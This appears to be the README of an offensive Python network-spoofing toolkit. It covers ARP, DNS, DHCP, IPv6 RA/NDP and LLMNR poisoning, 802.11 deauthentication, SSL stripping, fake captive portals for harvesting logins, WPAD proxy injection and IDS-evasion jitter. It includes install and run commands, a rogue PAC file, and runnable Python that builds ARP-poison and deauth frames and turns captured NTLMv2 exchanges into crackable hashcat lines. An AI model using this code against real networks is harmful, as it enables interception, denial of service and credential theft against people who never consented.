Professional-grade async Python network spoofing suite

Interactive menu-driven UI · Full IPv4/IPv6 coverage · Responder-style poisoning

Authorized security testing only — by amibhai
Disclaimer: This tool is for educational purposes and authorized security auditing only. The authors assume no liability and are not responsible for any misuse or damage caused by this program. Do not use this tool on networks you do not own or do not have explicit, written permission to test.
| Module | Description |
|---|---|
| attacks/deauth.py | 802.11 Deauthentication — kick clients, capture WPA handshakes |
| attacks/beacon_flood.py | 802.11 Beacon Flood — fake SSID storm |
| attacks/llmnr_nbt.py | LLMNR + NBT-NS + mDNS poisoning (Responder-style hash capture) |
| attacks/icmpv6_ra.py | ICMPv6 Router Advertisement spoof — IPv6 gateway hijack |
| attacks/ndp_spoof.py | IPv6 NDP Neighbor Advertisement poison — IPv6 ARP-equivalent spoof |
| attacks/captive_portal.py | Captive portal (hotel/corporate/cafe/ISP templates) |
| attacks/wpad.py | WPAD proxy auto-config injection |
| core/platform_compat.py | macOS pf + Linux iptables + Windows netsh abstraction |
| Timing jitter | ±N-second random delay on every packet burst for IDS evasion |
| GitHub Actions CI | pytest + mypy + coverage gate (≥80%) across Python 3.10–3.12 |
| Docker | docker build + docker-compose up for portable deployment |
| pyproject.toml | Modern packaging, mypy strict config, ruff lint, coverage config |
| Feature | Details |
|---|---|
| Architecture | 100% async Python 3.10+ — zero threading.Thread |
| UI | Animated 256-color banner + numbered menus + breadcrumbs |
| Dashboard | PRISM live 3-panel TUI (attack log / packet stats / credentials) |
| Logging | HMAC-SHA256-chained structlog audit trail (tamper-evident) |
| Reports | Auto-generated JSON + Markdown + HTML after every session |
| Languages | Auto-detect from LANG + manual switch (en, hi, ar, zh, fr, es) |
| Preflight | 16-check system (root, Python, deps, interfaces, terminal) |
| Cleanup | Always restores ARP/NDP tables, iptables/pf rules in finally |
| Platform | Linux (full) · macOS (pf backend) · Windows (Npcap, limited) |
| Module | File | Description |
|---|---|---|
| ARP Spoofing | attacks/arp_spoof.py | Cache poison — MitM, DoS, one-way, gateway-only |
| DNS Spoofing | attacks/dns_spoof.py | Response injection — selective, spoof-all, rules file, NXDOMAIN |
| Combined MitM | attacks/combined_mitm.py | Full ARP + DNS + credential capture (asyncio.TaskGroup) |
| SSL Strip | attacks/ssl_strip.py | Transparent HTTPS downgrade proxy (Linux/macOS) |
| Rogue DHCP | attacks/rogue_dhcp.py | Hijack default gateway via fake DHCP server (stealthy) |
| LLMNR/NBT-NS | attacks/llmnr_nbt.py | NEW — LLMNR + NBT-NS + mDNS poisoning, NTLMv2 hash capture |
| WPAD | attacks/wpad.py | NEW — Browser proxy auto-config injection |
| Captive Portal | attacks/captive_portal.py | NEW — Fake login page with 4 templates |
| Module | File | Description |
|---|---|---|
| Deauth | attacks/deauth.py | NEW — 802.11 deauthentication (targeted + broadcast), WPA handshake capture |
| Beacon Flood | attacks/beacon_flood.py | NEW — Flood airwaves with hundreds of fake SSIDs |
| AP Scanner | attacks/deauth.py | NEW — Passive 802.11 beacon scanner |
| Client Scanner | attacks/deauth.py | NEW — Detect clients associated with an AP |
| Module | File | Description |
|---|---|---|
| RA Spoof | attacks/icmpv6_ra.py | NEW — ICMPv6 Router Advertisement (default gateway hijack) |
| NDP Spoof | attacks/ndp_spoof.py | NEW — Neighbor Advertisement poison (IPv6 ARP equivalent) |
| Full IPv6 MitM | (combo) | NEW — RA + NDP + IPv6 forwarding for complete IPv6 intercept |
```bash
# 1. Install
sudo bash install.sh

# 2. Run (interactive menu)
sudo spoof-toolkit

# 3. Or run directly
sudo python3 spoof_toolkit.py

# 4. Preflight check
sudo python3 spoof_toolkit.py --preflight

# 5. Launch PRISM dashboard directly
sudo python3 spoof_toolkit.py --prism

# 6. Docker (no install needed)
docker build -t spoof-toolkit .
docker run --rm -it --network host --cap-add NET_RAW --cap-add NET_ADMIN spoof-toolkit
```

```text
╔════════════════════════════════════════════════════════════════════╗
║               SPOOF TOOLKIT v2.1 — INTERACTIVE MENU                ║
║                                                                    ║
║ Layer 2 / 3                                                        ║
║ 1. ARP Spoofing — cache poison, MitM, DoS, one-way                 ║
║ 2. DNS Spoofing — domain hijack, spoof-all, NXDOMAIN               ║
║ 3. Combined MitM — ARP + DNS + credential capture chain            ║
║ 4. SSL Strip — HTTPS downgrade interception                        ║
║ 5. Rogue DHCP — gateway hijack via fake DHCP server                ║
║                                                                    ║
║ 802.11 Wireless                                                    ║
║ 6. 802.11 Wireless — deauth, beacon flood, AP/client scan [NEW]    ║
║ 7. LLMNR / NBT-NS — Responder-style NTLMv2 hash capture [NEW]      ║
║ 8. IPv6 Attacks — RA spoof + NDP poison (IPv6 MitM) [NEW]          ║
║ 9. Captive Portal — fake login page + WPAD proxy inject [NEW]      ║
║                                                                    ║
║ Infrastructure                                                     ║
║ A. Wireless Adapter — detect, monitor mode, channel hop            ║
║ E. Evasion — timing jitter, MAC rotate [NEW]                       ║
║ P. PRISM Dashboard — live 3-panel TUI attack monitor               ║
║ R. Session Report — generate JSON / Markdown / HTML                ║
║ F. Preflight Check — verify all dependencies and privileges        ║
║ L. Language — switch UI language                                   ║
║ 0. Exit                                                            ║
╚════════════════════════════════════════════════════════════════════╝
```
```text
spoofing/
├── spoof_toolkit.py              # Entry point — banner, preflight, main menu
├── install.sh                    # Auto-install (apt / pacman / dnf / brew)
├── requirements.txt              # scapy, rich, aiofiles, structlog, aiohttp
├── pyproject.toml                # mypy + coverage + ruff configuration [NEW]
├── Dockerfile                    # Portable Linux container [NEW]
├── docker-compose.yml            # Compose with NET_RAW caps [NEW]
│
├── .github/workflows/ci.yml      # GitHub Actions: pytest + mypy + coverage [NEW]
│
├── core/
│   ├── banner.py                 # Animated 256-color ASCII art banner
│   ├── preflight.py              # 16-check dependency/privilege system
│   ├── menu.py                   # Reusable numbered menu engine + PromptHelper
│   ├── session.py                # Session state dataclass (shared across all modules)
│   ├── logger.py                 # HMAC-SHA256-chained structlog audit logger
│   ├── reporter.py               # JSON + Markdown + HTML report generator
│   └── platform_compat.py        # macOS pf / Linux iptables / Windows netsh [NEW]
│
├── attacks/
│   ├── arp_spoof.py              # Async ARP poisoner (mitm/dos/oneway/gateway_only)
│   ├── dns_spoof.py              # Async DNS injector (selective/spoof_all/rules/nxdomain)
│   ├── combined_mitm.py          # asyncio.TaskGroup orchestrator
│   ├── ssl_strip.py              # Transparent HTTPS-downgrade proxy
│   ├── rogue_dhcp.py             # Rogue DHCP server
│   ├── deauth.py                 # 802.11 deauth + AP scanner + client scanner [NEW]
│   ├── beacon_flood.py           # 802.11 beacon flood (fake SSID storm) [NEW]
│   ├── llmnr_nbt.py              # LLMNR + NBT-NS + mDNS poisoner [NEW]
│   ├── icmpv6_ra.py              # ICMPv6 Router Advertisement spoof [NEW]
│   ├── ndp_spoof.py              # IPv6 NDP Neighbor Advertisement poison [NEW]
│   ├── captive_portal.py         # Fake captive portal (4 templates) [NEW]
│   └── wpad.py                   # WPAD proxy auto-config server [NEW]
│
├── wireless/
│   └── adapter.py                # WirelessManager — detect, monitor, channel hop
│
├── capture/
│   └── credential_sniffer.py     # Async extractor (HTTP/FTP/SMTP/IMAP/POP3/Telnet)
│
├── dashboard/
│   └── prism.py                  # PRISM live TUI — rich.Live 3-panel layout
│
├── i18n/                         # UI translations (en, hi, ar, zh, fr, es)
├── rules/spoof_rules.txt         # DNS spoof rules (domain → fake_ip, wildcards)
├── wordlists/domains.txt         # ~170 domains for spoof-all mode
│
├── tests/
│   ├── test_arp.py               # 8 tests — ARP mode, MAC random, storm detection
│   ├── test_dns.py               # 10 tests — rule matching, wildcard, file parsing
│   ├── test_session.py           # 17 tests — state, credentials, stats, serialize
│   ├── test_deauth.py            # 12 tests — 802.11 deauth, AP scanner [NEW]
│   └── test_llmnr.py             # 14 tests — LLMNR dispatch, NBT-NS decode, hash [NEW]
│
└── output/                       # Reports and audit logs (gitignored)
```
| Mode | Poisons | IP Forwarding | Effect |
|---|---|---|---|
| mitm | Victim + Gateway | Yes (platform-aware) | Full bidirectional intercept |
| dos | Victim (dead MAC) | No | Kill victim connectivity |
| oneway | Victim only | No | Capture outbound only |
| gateway_only | Gateway only | No | Capture inbound to victim |
v2.1 additions: timing jitter (±N sec), macOS sysctl IP forwarding via platform_compat.
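What each mode in the table actually puts on the wire, as an added example that is not attacks/arp_spoof.py: raw Ethernet + ARP reply frames built with struct (no scapy needed), one builder per mode, plus the genuine-mapping restore burst and a decoder that shows the mapping a victim will cache. The `DEAD_MAC` value and the attacker/victim/gateway addresses in the usage are assumptions; the page only says "dead MAC".

```python
"""ARP cache-poisoning frames for the four modes above (added example)."""
import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
ARP_REPLY = 2
DEAD_MAC = "de:ad:be:ef:00:00"  # assumed value for the "dead MAC" used in dos mode


def _mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def arp_reply(dst_mac, src_mac, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II + ARP reply (42 bytes). The receiver caches sender_ip -> sender_mac,
    regardless of the Ethernet source address."""
    eth = _mac(dst_mac) + _mac(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # htype Ethernet, ptype IPv4, hlen, plen, op
           + _mac(sender_mac) + IPv4Address(sender_ip).packed
           + _mac(target_mac) + IPv4Address(target_ip).packed)
    return eth + arp


def decode_arp(frame: bytes) -> dict:
    """Read back the mapping a frame advertises (offsets: 14-byte Ethernet header, then ARP)."""
    op, = struct.unpack_from("!H", frame, 20)
    return {"op": op,
            "sender_mac": frame[22:28].hex(":"), "sender_ip": str(IPv4Address(frame[28:32])),
            "target_mac": frame[32:38].hex(":"), "target_ip": str(IPv4Address(frame[38:42]))}


def poison_burst(mode, attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Frames to send every interval for a mode, and whether IP forwarding must be on (as in the table)."""
    tell_victim = arp_reply(victim_mac, attacker_mac, attacker_mac, gateway_ip, victim_mac, victim_ip)    # "gateway is at attacker"
    tell_gateway = arp_reply(gateway_mac, attacker_mac, attacker_mac, victim_ip, gateway_mac, gateway_ip)  # "victim is at attacker"
    if mode == "mitm":
        return [tell_victim, tell_gateway], True   # both directions cross us; forwarding keeps the victim online
    if mode == "oneway":
        return [tell_victim], False                # only victim -> gateway traffic reaches us (and is not relayed)
    if mode == "gateway_only":
        return [tell_gateway], False               # only gateway -> victim traffic reaches us
    if mode == "dos":
        return [arp_reply(victim_mac, attacker_mac, DEAD_MAC, gateway_ip, victim_mac, victim_ip)], False
    raise ValueError(f"unknown mode {mode!r}")


def restore_burst(victim_mac, victim_ip, gateway_mac, gateway_ip, repeat=5):
    """Genuine mappings, repeated so both caches converge even if a frame is lost (the 5x in the notes)."""
    fix_victim = arp_reply(victim_mac, gateway_mac, gateway_mac, gateway_ip, victim_mac, victim_ip)
    fix_gateway = arp_reply(gateway_mac, victim_mac, victim_mac, victim_ip, gateway_mac, gateway_ip)
    return [fix_victim, fix_gateway] * repeat


if __name__ == "__main__":
    # Constructed addresses for illustration only.
    A, V, G = "02:00:00:00:00:aa", "02:00:00:00:00:bb", "02:00:00:00:00:01"
    for mode in ("mitm", "dos", "oneway", "gateway_only"):
        frames, forward = poison_burst(mode, A, V, "10.0.0.5", G, "10.0.0.1")
        print(mode, "forwarding:", forward, [decode_arp(f) for f in frames])
```

Sending these frames needs a raw socket bound to the interface (`socket.AF_PACKET` on Linux) and CAP_NET_RAW; the decode step is also what a storm detector looks at, since a poisoned cache shows the same sender_mac for two different sender_ips.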
Deauth attack sends two frames per burst:
Frame 1: AP → client (type=0, subtype=12, reason=3)
Frame 2: client → AP (type=0, subtype=12, reason=3)
Targeted: deauth one specific client MAC
Broadcast: deauth ALL clients (addr1 = ff:ff:ff:ff:ff:ff)
Effect 1: DoS — clients disconnect and reconnect (sustained for as long as the bursts continue; connectivity returns when the attack stops)
Effect 2: WPA handshake — client re-authenticates while we sniff → capture 4-way handshake
Requires: monitor mode on wireless interface
Caveat: networks that negotiate 802.11w Protected Management Frames (mandatory in WPA3, optional in WPA2) discard forged deauth frames, so PMF-protected clients are not affected.
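The frames the notes describe, byte for byte, as an added example that is not attacks/deauth.py: a builder for the 24-byte management header plus reason code (type 0, subtype 12, reason 3), a decoder to check the fields, and a burst generator that emits the AP→client and client→AP pair for a targeted deauth or the single addr1 = ff:ff:ff:ff:ff:ff frame for broadcast. The duration value and the empty radiotap header prepended for monitor-mode injection are assumptions, not values taken from the project.

```python
"""802.11 deauthentication frames (added example, not the toolkit's code)."""
from __future__ import annotations

import struct

REASON_STA_LEAVING = 3                  # reason code 3: sending STA is leaving (or has left) the BSS
BROADCAST = "ff:ff:ff:ff:ff:ff"
RADIOTAP_EMPTY = bytes.fromhex("0000080000000000")  # version 0, pad, length 8 (LE), no fields present


def _mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def deauth_frame(addr1: str, addr2: str, bssid: str, reason: int = REASON_STA_LEAVING, seq: int = 0) -> bytes:
    """Management header (24 bytes) + 2-byte reason code; 802.11 fields are little-endian."""
    frame_control = (0 << 2) | (12 << 4)               # protocol 0, type 0 (management), subtype 12 (deauth) -> 0x00C0
    header = (struct.pack("<HH", frame_control, 0x013A)  # duration/ID: assumed value, commonly seen in injected frames
              + _mac(addr1) + _mac(addr2) + _mac(bssid)  # receiver, transmitter, BSSID
              + struct.pack("<H", seq << 4))            # sequence control: 12-bit sequence number, 4-bit fragment
    return header + struct.pack("<H", reason)


def decode_deauth(frame: bytes) -> dict:
    """Read back type/subtype, the three addresses and the reason code from a bare 802.11 frame."""
    fc, = struct.unpack_from("<H", frame, 0)
    return {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "addr1": frame[4:10].hex(":"), "addr2": frame[10:16].hex(":"), "addr3": frame[16:22].hex(":"),
            "reason": struct.unpack_from("<H", frame, 24)[0]}


def deauth_burst(ap_mac: str, client_mac: str | None = None, seq: int = 0) -> list[bytes]:
    """Targeted: AP->client then client->AP so both ends drop the association.
    Broadcast (no client): one AP->ff:ff:ff:ff:ff:ff frame; a client->AP frame has no meaning there."""
    target = client_mac or BROADCAST
    frames = [RADIOTAP_EMPTY + deauth_frame(target, ap_mac, ap_mac, seq=seq)]
    if client_mac:
        frames.append(RADIOTAP_EMPTY + deauth_frame(ap_mac, client_mac, ap_mac, seq=seq))
    return frames


if __name__ == "__main__":
    # Constructed addresses for illustration only.
    for f in deauth_burst("aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"):
        bare = f[len(RADIOTAP_EMPTY):]
        print(bare.hex(), decode_deauth(bare))
```

Injecting these requires a monitor-mode interface (see the Wireless Adapter menu) and a raw socket on it; the radiotap prefix is what the driver expects in front of the 802.11 frame.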
Sends crafted 802.11 Beacon frames at ~100/s per channel.
Each beacon advertises a different fake SSID.
SSID modes:
random — 500 random 4-16 char names
funny — "FBI Surveillance Van", "router virus.exe", etc.
sequential — SSID_0000 through SSID_0999
wordlist — load from any file
list — user-specified comma-separated SSIDs
Effect: overwhelms WiFi scanners, confuses clients, radio congestion
When Windows can't resolve a hostname via DNS, it falls back to:
1. LLMNR (Link-Local Multicast Name Resolution) — UDP 5355, 224.0.0.252
2. NBT-NS (NetBIOS Name Service) — UDP 137 broadcast
3. mDNS (Bonjour/Avahi) — UDP 5353, 224.0.0.251
We respond with our IP for every query. Windows then initiates
NTLMv2 authentication, and we log the Net-NTLMv2 hash.
Hash output (hashcat -m 5600 format: user::domain:server_challenge:NTProofStr:blob, hex fields):
alice::CORP:<16 hex chars, 8-byte server challenge>:<32 hex chars, 16-byte NTProofStr>:<ntlmv2 blob, hex>
Export: poisoner.export_hashes("output/hashes.txt")
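How a Net-NTLMv2 capture becomes a hashcat 5600 line, as an added example that is not attacks/llmnr_nbt.py: it pulls the 8-byte server challenge out of the NTLMSSP CHALLENGE_MESSAGE (type 2) we send, parses the AUTHENTICATE_MESSAGE (type 3) the Windows client answers with, and splits the NT response into NTProofStr and blob. It also implements the per-candidate check hashcat performs for this mode, so the line can be verified offline. The type 2/type 3 builders only fabricate a constructed exchange so the block runs without a network; the NT hash used is the well-known hash of the password "password", and the timestamp and client challenge are made up.

```python
"""NTLMSSP type 2 / type 3 -> hashcat -m 5600 (added example, layouts per MS-NLMP)."""
import hashlib
import hmac
import struct

NTLMSSP = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001  # strings in the message are UTF-16LE


def server_challenge(type2: bytes) -> bytes:
    """CHALLENGE_MESSAGE: the 8-byte ServerChallenge sits at fixed offset 24."""
    if type2[:8] != NTLMSSP or struct.unpack_from("<I", type2, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE_MESSAGE")
    return type2[24:32]


def parse_type3(type3: bytes) -> dict:
    """AUTHENTICATE_MESSAGE: six (Len, MaxLen, Offset) descriptors start at offset 12; flags at 60."""
    if type3[:8] != NTLMSSP or struct.unpack_from("<I", type3, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")

    def field(i: int) -> bytes:
        length, _maxlen, offset = struct.unpack_from("<HHI", type3, 12 + 8 * i)
        return type3[offset:offset + length]

    flags = struct.unpack_from("<I", type3, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"  # OEM charset assumed latin-1
    return {"lm": field(0), "nt": field(1), "domain": field(2).decode(enc),
            "user": field(3).decode(enc), "workstation": field(4).decode(enc)}


def hashcat_5600(chal: bytes, auth: dict) -> str:
    """user::domain:ServerChallenge:NTProofStr:blob. NTProofStr is the first 16 bytes of the NT response."""
    nt = auth["nt"]
    if len(nt) <= 24:  # a 24-byte NT response is NTLMv1 (-m 5500), not NTLMv2
        raise ValueError("NtChallengeResponse is not NTLMv2")
    return f"{auth['user']}::{auth['domain']}:{chal.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"


def ntlmv2_proof(nt_hash: bytes, user: str, domain: str, chal: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, UPPER(user) + domain), ServerChallenge || blob)."""
    v2_hash = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(v2_hash, chal + blob, hashlib.md5).digest()


def check_candidate(line: str, nt_hash: bytes) -> bool:
    """One guess of the offline attack: does this NT hash reproduce the captured NTProofStr?"""
    user, _, domain, chal, proof, blob = line.split(":")
    expected = ntlmv2_proof(nt_hash, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
    return hmac.compare_digest(expected, bytes.fromhex(proof))


# --- builders used only to fabricate the constructed sample exchange below ---

def build_type2(chal: bytes) -> bytes:
    """56-byte header with empty TargetName/TargetInfo; the challenge lands at offset 24."""
    return (NTLMSSP + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 56)
            + struct.pack("<I", NEGOTIATE_UNICODE) + chal + bytes(8)
            + struct.pack("<HHI", 0, 0, 56) + bytes(8))


def build_type3(user: str, domain: str, workstation: str, nt_response: bytes) -> bytes:
    payload_fields = [bytes(24), nt_response, domain.encode("utf-16-le"),
                      user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    header, payload, offset = NTLMSSP + struct.pack("<I", 3), b"", 88  # 88 = fixed header incl. Version + MIC
    for f in payload_fields:
        header += struct.pack("<HHI", len(f), len(f), offset)
        payload += f
        offset += len(f)
    header += struct.pack("<I", NEGOTIATE_UNICODE) + bytes(8) + bytes(16)
    return header + payload


def sample_exchange() -> tuple[str, bytes]:
    """Constructed capture; returns (hashcat line, NT hash that produced it)."""
    nt_hash = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # NT hash of "password"
    chal = bytes.fromhex("1122334455667788")
    # NTLMv2 blob: RespType, HiRespType, reserved, timestamp, client challenge, reserved, AV pairs (EOL), reserved
    blob = (b"\x01\x01" + bytes(6) + struct.pack("<Q", 0x01D9C0FFEE000000)
            + bytes.fromhex("aabbccddeeff0011") + bytes(4) + bytes(4) + bytes(4))
    user, domain = "alice", "CORP"
    nt_response = ntlmv2_proof(nt_hash, user, domain, chal, blob) + blob
    t2, t3 = build_type2(chal), build_type3(user, domain, "WS01", nt_response)
    return hashcat_5600(server_challenge(t2), parse_type3(t3)), nt_hash


if __name__ == "__main__":
    line, nt_hash = sample_exchange()
    print(line)
    print("candidate NT hash matches:", check_candidate(line, nt_hash))
```

Two details matter when wiring this into a poisoner: the server challenge must be the one from the type 2 message the poisoner itself sent (a fixed challenge such as 1122334455667788 is what Responder uses, which is why precomputed attacks exist), and a 24-byte NT response means the client fell back to NTLMv1, which goes in a separate 5500 file.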
IPv6 hosts use NDP Router Discovery to find the default gateway.
We send unsolicited Router Advertisement (ICMPv6 type 134) claiming
to be the router. Victims route all IPv6 traffic through us.
Modes:
periodic — send RA every N seconds
responsive — sniff RS frames and reply immediately
flood — rapid RA DoS (confuses IPv6 autoconfiguration)
Includes RDNSS option (RFC 8106, which obsoletes RFC 6106) to inject a rogue IPv6 DNS server.
Caveat: switches with RA Guard (RFC 6105) drop RAs arriving on access ports, and hosts keep the legitimate router unless our RA wins on Router Preference (RFC 4191) and lifetime.
IPv6 ARP equivalent — poison the neighbor cache.
Send forged Neighbor Advertisement (NA) messages mapping a target
IPv6 address to our MAC.
Modes:
mitm — poison victim ↔ gateway (bidirectional IPv6 intercept)
dos — poison with dead MAC (kill IPv6 connectivity)
oneway — poison victim only
responsive — reply immediately to Neighbor Solicitation frames
Async aiohttp-based HTTP server serving a fake login page.
Templates:
hotel — room number / surname login
corporate — DOMAIN\username / password (users are used to typing domain credentials into this form)
cafe — email / WiFi password (on receipt)
isp — generic username / password
All credential submissions are:
1. Logged to session.captured_creds
2. Displayed live in console
3. Included in session report (JSON/MD/HTML)
4. Victim is redirected to Google after submit
Combine with:
- Rogue DHCP → victim uses us as gateway + DNS
- DNS spoof → redirect all HTTP → captive portal IP
- iptables → redirect port 80 → portal port
Browsers and OS clients look up http://wpad.{domain}/wpad.dat
for automatic proxy configuration.
Attack chain:
1. dns_spoof: wpad.* → attacker IP
2. WPADServer on port 80 serves PAC file:
function FindProxyForURL(url, host) {
return "PROXY 192.168.1.200:8080; DIRECT";
}
3. All browser traffic routes through attacker's proxy
4. ssl_strip or mitmproxy on port 8080 intercepts it
Use wpad.inject_dns_rules() to automatically add wpad.* entries
to the active DNS spoofing session.
All packet burst loops support ±N-second random delay:
session.timing_jitter = 0.5 # ±0.5s added to every 2s ARP interval
ARP: actual delay = 2.0 + uniform(-jitter, jitter), min 0.5s
DNS: small jitter (≤ 10% of jitter value) before sending the forged response
Deauth: actual delay = interval + uniform(-jitter, jitter), min 0.05s
NDP: actual delay = 5.0 + uniform(-jitter, jitter), min 1s
Effect: randomizes packet timing to avoid IDS rate-based detection rules.
Set via menu: Evasion → Timing jitter
| Platform | IP Forwarding | Port Redirect | Notes |
|---|---|---|---|
| Linux | sysctl net.ipv4.ip_forward | iptables -t nat | Full support |
| macOS | sysctl net.inet.ip.forwarding | pfctl anchor | pf backend |
| Windows | Registry IPEnableRouter | netsh portproxy | Limited, Npcap required; IPEnableRouter needs a reboot (or a restart of Routing and Remote Access) to take effect, and portproxy forwards TCP only |
```python
import asyncio

from core.platform_compat import get_firewall, Platform


async def main() -> None:
    fw = get_firewall()                      # auto-selects backend from platform.system()
    await fw.enable_ip_forwarding()          # Linux: sysctl, macOS: pf
    try:
        await fw.redirect_port("eth0", from_port=80, to_port=8080)
        ...                                  # run the attack while the redirect is active
    finally:
        await fw.restore()                   # always clean up, also on Ctrl+C


asyncio.run(main())
```

`.github/workflows/ci.yml` runs on every push:

1. Install system deps (libpcap-dev)
2. mypy type-checking on core + attacks + capture + dashboard + wireless
3. pytest with --cov-fail-under=80 (≥80% coverage gate)
4. ruff lint (E,W,F,B,I)
5. Docker build verification

```bash
# Build
docker build -t spoof-toolkit .

# Run interactive (full network access)
docker run --rm -it \
  --network host \
  --cap-add NET_RAW \
  --cap-add NET_ADMIN \
  -v $(pwd)/output:/opt/spoof-toolkit/output \
  spoof-toolkit

# Run tests only (no privileges needed)
docker-compose run test

# Preflight check
docker run --rm --network host --cap-add NET_RAW spoof-toolkit --preflight
```

```bash
# All 61 tests
python3 -m pytest tests/ -v

# With coverage report
python3 -m pytest tests/ --cov=core --cov=attacks --cov-report=term-missing

# Individual suites
python3 -m pytest tests/test_arp.py -v       # 8 tests — ARP modes, MAC, storm
python3 -m pytest tests/test_dns.py -v       # 10 tests — rule matching, wildcards
python3 -m pytest tests/test_session.py -v   # 17 tests — state, credentials, stats
python3 -m pytest tests/test_deauth.py -v    # 12 tests — deauth loop, AP scanner [NEW]
python3 -m pytest tests/test_llmnr.py -v     # 14 tests — LLMNR, NBT-NS, hashes [NEW]
```

Generated automatically on Ctrl+C and via menu:

```text
output/
report_YYYYMMDD_HHMMSS.json    — structured data + HMAC integrity hash
report_YYYYMMDD_HHMMSS.md      — Markdown with tables
report_YYYYMMDD_HHMMSS.html    — self-contained dark-themed HTML
session_YYYYMMDD_HHMMSS.jsonl  — HMAC-chained audit log
hashes.txt                     — hashcat-format NTLMv2 hashes (if captured)
```

Verify audit chain integrity:

```bash
python3 -c "
from core.logger import HMACChainedLogger
from pathlib import Path
valid, count, err = HMACChainedLogger.verify_chain(Path('output/session_XXX.jsonl'))
print('Valid:', valid, 'Entries:', count, 'Error:', err or 'none')
"
```

| Protocol | What is extracted |
|---|---|
| HTTP | Basic Auth (base64), POST form fields, session cookies |
| FTP | USER + PASS commands |
| Telnet | Reconstructed login stream |
| SMTP | AUTH PLAIN / AUTH LOGIN (base64 decode) |
| IMAP | LOGIN username + password |
| POP3 | USER + PASS commands |
| Captive Portal | Form credentials (any template) |
| LLMNR/NBT-NS | NTLMv2 challenge-response hashes |
```bash
# Full auto-install (Debian/Ubuntu/Arch/Fedora/macOS)
sudo bash install.sh

# Manual
pip3 install -e ".[dev]"                              # installs all deps + dev tools
sudo apt install aircrack-ng iw net-tools iptables    # Debian/Ubuntu
brew install libpcap aircrack-ng                      # macOS

# Verify
python3 -m pytest tests/ -v
sudo python3 spoof_toolkit.py --preflight
```

AsyncSniffer bridge: Scapy's AsyncSniffer runs in a background thread.
Packets forward to asyncio via run_coroutine_threadsafe() + asyncio.Queue.
HMAC audit chain: _hmac = HMAC-SHA256(key, prev_hmac + entry_json). Any
post-hoc modification breaks the chain — detectable via verify_chain(). The
chain proves only that nobody without the key edited or reordered entries:
whoever holds the key can rewrite and re-sign the log, and dropping entries
from the tail is not detected unless the expected count is recorded elsewhere,
so keep the key outside output/ and note the final entry count in the report.
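The chain construction and the verify_chain() check from the two passages above, as an added example that is not core/logger.py: a minimal HMAC-chained JSONL writer and verifier, followed by a demo that tampers with one entry, uses a wrong key, and truncates the file, so the reader can see which of these verification catches. The GENESIS value, the canonical JSON form and the key handling are assumptions; the toolkit's own choices are not on the page.

```python
"""HMAC-chained JSONL audit log with verification (added example)."""
from __future__ import annotations

import hashlib
import hmac
import json
import tempfile
from pathlib import Path

GENESIS = "0" * 64  # stands in for prev_hmac before the first entry (assumed convention)


def _canonical(entry: dict) -> str:
    """Deterministic JSON so writer and verifier hash byte-identical input."""
    return json.dumps(entry, sort_keys=True, separators=(",", ":"))


def _link(key: bytes, prev_hmac: str, entry: dict) -> str:
    """_hmac = HMAC-SHA256(key, prev_hmac || entry_json)."""
    return hmac.new(key, (prev_hmac + _canonical(entry)).encode(), hashlib.sha256).hexdigest()


class ChainedAuditLog:
    def __init__(self, path, key: bytes):
        self.path = Path(path)
        self.key = key
        self._prev = self._tail_hmac()  # resume an existing file from its last link

    def _tail_hmac(self) -> str:
        last = GENESIS
        if self.path.exists():
            for line in self.path.read_text().splitlines():
                if line.strip():
                    last = json.loads(line)["_hmac"]
        return last

    def append(self, **fields) -> str:
        mac = _link(self.key, self._prev, fields)
        with self.path.open("a") as fh:
            fh.write(_canonical({**fields, "_hmac": mac}) + "\n")
        self._prev = mac
        return mac

    @staticmethod
    def verify_chain(path, key: bytes) -> tuple[bool, int, str | None]:
        """Recompute every link in order; returns (valid, entries_verified, error)."""
        prev, count = GENESIS, 0
        for lineno, line in enumerate(Path(path).read_text().splitlines(), 1):
            if not line.strip():
                continue
            rec = json.loads(line)
            claimed = rec.pop("_hmac", None)
            if claimed is None:
                return False, count, f"line {lineno}: missing _hmac"
            if not hmac.compare_digest(claimed, _link(key, prev, rec)):
                return False, count, f"line {lineno}: HMAC mismatch (edited, reordered or wrong key)"
            prev, count = claimed, count + 1
        return True, count, None


def demo() -> dict:
    """Write three entries, then show what verification does and does not catch."""
    key = b"per-session key, kept outside output/"  # assumed: the page does not say where the key lives
    path = Path(tempfile.mkdtemp()) / "session.jsonl"
    log = ChainedAuditLog(path, key)
    log.append(event="session_start", operator="tester")
    log.append(event="arp_spoof", mode="mitm", target="10.0.0.5")  # constructed entries
    log.append(event="session_end")
    results = {"intact": ChainedAuditLog.verify_chain(path, key),
               "wrong_key": ChainedAuditLog.verify_chain(path, b"not-the-key")}

    lines = path.read_text().splitlines()
    edited = json.loads(lines[1])
    edited["target"] = "10.0.0.99"  # post-hoc edit of entry 2, its _hmac left untouched
    lines[1] = _canonical(edited)
    path.write_text("\n".join(lines) + "\n")
    results["edited"] = ChainedAuditLog.verify_chain(path, key)

    path.write_text(lines[0] + "\n")  # tail dropped: the surviving prefix still verifies
    results["truncated"] = ChainedAuditLog.verify_chain(path, key)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:10s} valid={outcome[0]} entries={outcome[1]} error={outcome[2] or 'none'}")
```

The "truncated" result is the one to remember: a chain alone cannot tell a complete log from a shortened one, which is why the report should carry the final entry count (or the last _hmac) out of band.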
